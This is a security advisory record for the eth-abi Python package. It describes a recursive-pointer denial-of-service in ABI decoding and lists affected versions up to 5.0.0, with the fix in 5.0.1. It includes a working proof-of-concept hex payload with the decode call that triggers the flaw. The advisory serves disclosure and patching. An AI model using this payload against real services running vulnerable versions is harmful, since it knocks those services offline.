GHSA-3qwc-47jf-5rf7

Suggest an improvement
Source
https://github.com/advisories/GHSA-3qwc-47jf-5rf7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-3qwc-47jf-5rf7/GHSA-3qwc-47jf-5rf7.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3qwc-47jf-5rf7
Published
2024-03-05T14:39:13Z
Modified
2024-12-03T05:48:52.734875Z
Summary
eth-abi is vulnerable to recursive DoS
Details

This is related to recent ZST stuff (https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g), but it's a different one. Basically a recursive pointer issue

from eth_abi import decode


payload = "0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020"

# OverflowError: Python int too large to convert to C ssize_t
#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))

decode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))
Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-05T14:39:13Z"
}
References

Affected packages

PyPI / eth-abi

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
5.0.1

Affected versions

0.*

0.5.0

1.*

1.0.0b0
1.0.0b1
1.0.0
1.1.0
1.1.1
1.2.0
1.2.1
1.2.2
1.3.0

2.*

2.0.0a1
2.0.0b0
2.0.0b1
2.0.0b2
2.0.0b3
2.0.0b4
2.0.0b5
2.0.0b6
2.0.0b7
2.0.0b8
2.0.0b9
2.0.0
2.1.0
2.1.1
2.2.0

3.*

3.0.0
3.0.1

4.*

4.0.0b1
4.0.0b2
4.0.0b3
4.0.0
4.1.0
4.2.0
4.2.1

5.*

5.0.0

Database specific

{
    "last_known_affected_version_range": "<= 5.0.0"
}